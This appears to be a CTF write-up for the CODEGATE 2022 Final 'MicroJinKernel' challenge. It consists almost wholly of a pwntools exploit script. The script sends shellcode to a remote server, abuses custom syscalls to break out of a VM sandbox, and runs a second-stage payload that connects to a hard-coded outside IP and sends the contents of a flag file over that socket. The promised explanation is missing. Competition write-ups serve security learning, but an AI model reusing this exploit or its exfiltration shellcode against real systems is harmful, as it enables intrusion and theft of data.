CODEGATE 2022 Final – MicroJinKernel WriteUp

Exploit Code:

from pwn import *

context(arch='amd64', os='linux', log_level='debug')
#p = process('./microjinkernel', aslr=True)
p = remote('52.78.196.197', 7483)

shellcode = '''
    lea r8, [rip+0x1f9]
    lea r9, [rip+0x210]
    lea r11, [rip+0x227]
    mov rbp, rsp
    sub rsp, 0x208
    mov rdi, r8
    mov rsi, 0x10
    call cus_open
    mov rdi, r9
    mov rsi, 0x10
    call cus_open
    mov rdi, 0
    mov rsi, 0xf
    call cus_init
    mov rdi, 1
    mov rsi, 0x1000
    call cus_init
    mov rdi, 1
    call cus_close
    mov r10, 0x11017e8
    mov QWORD PTR [r10], 1
    add r10, 8
    mov QWORD PTR [r10], 0x38273
    add r10, 8
    mov QWORD PTR [r10], 1
    mov rdi, 0x1100000
    mov rsi, 0xff
    call cus_vuln
    mov rdi, 0xffffffff00000000
    mov rsi, 0x20
    mov rdx, 0x18
    mov rcx, 0x1100000
    call cus_write_vm
    mov r10, 0x1100000
    sub QWORD PTR [r10], 0x360
    sub QWORD PTR [r10+0x10], 0x3e50
    add QWORD PTR [r10+0x10], 0xcd70
    mov rsi, QWORD PTR [r10]
    sub rsi, QWORD PTR [r10+0x10]
    add rsi, 0x1f6b
    mov rdi, 0xffffffff00000000
    mov rdx, 0x600
    mov rcx, r11
    call cus_read_vm
cus_open:
    mov rax, 0x10001
    syscall
    ret
cus_init:
    mov rax, 0x10002
    syscall
    ret
cus_close:
    mov rax, 0x10003
    syscall
    ret
cus_read_vm:
    mov rax, 0x10004
    syscall
    ret
cus_write_vm:
    mov rax, 0x10005
    syscall
    ret
read_or_write:
    mov rax, 0x10006
    syscall
    ret
cus_vuln:
    mov rax, 0x10007
    syscall
    ret
'''
# open socket, connect, open flag, read flag, write socket
shellcode2 = '''
    mov rdi, 2
    mov rsi, 1
    mov rdx, 0
    mov rax, 0x29
    syscall
    mov r8, rax
    mov rdi, rax
    mov rdx, 0x10
    mov rax, 0
    push rax
    mov rax, 0xe296260e401f0002
    push rax
    mov rsi, rsp
    mov rax, 0x2a
    syscall
    mov rax, 0x67616c662f2e 
    push rax
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 2
    syscall
    mov rdi, rax
    mov rsi, rsp
    sub rsi, 0x70
    mov rdx, 0x70
    mov rax, 0x0
    syscall
    mov rdi, r8
    mov rax, 0x1
    syscall
'''
shellcode = asm(shellcode)
shellcode2 = asm(shellcode2)
shellcode = shellcode.ljust(0x200, "\x90")
payload = '/tmp/test' + "\x00"*21 + '/tmp/booo' + "\x00"*21 + '\x90'*0x105 + shellcode2 + '\x90'*0x100
payload = payload.ljust(0x100, "\x00")
shellcode = shellcode + payload
shellcode = shellcode.ljust(0x1000, "\x00")

pause()
p.sendafter('code > ', shellcode)

p.interactive()

설명 추후 추가 예정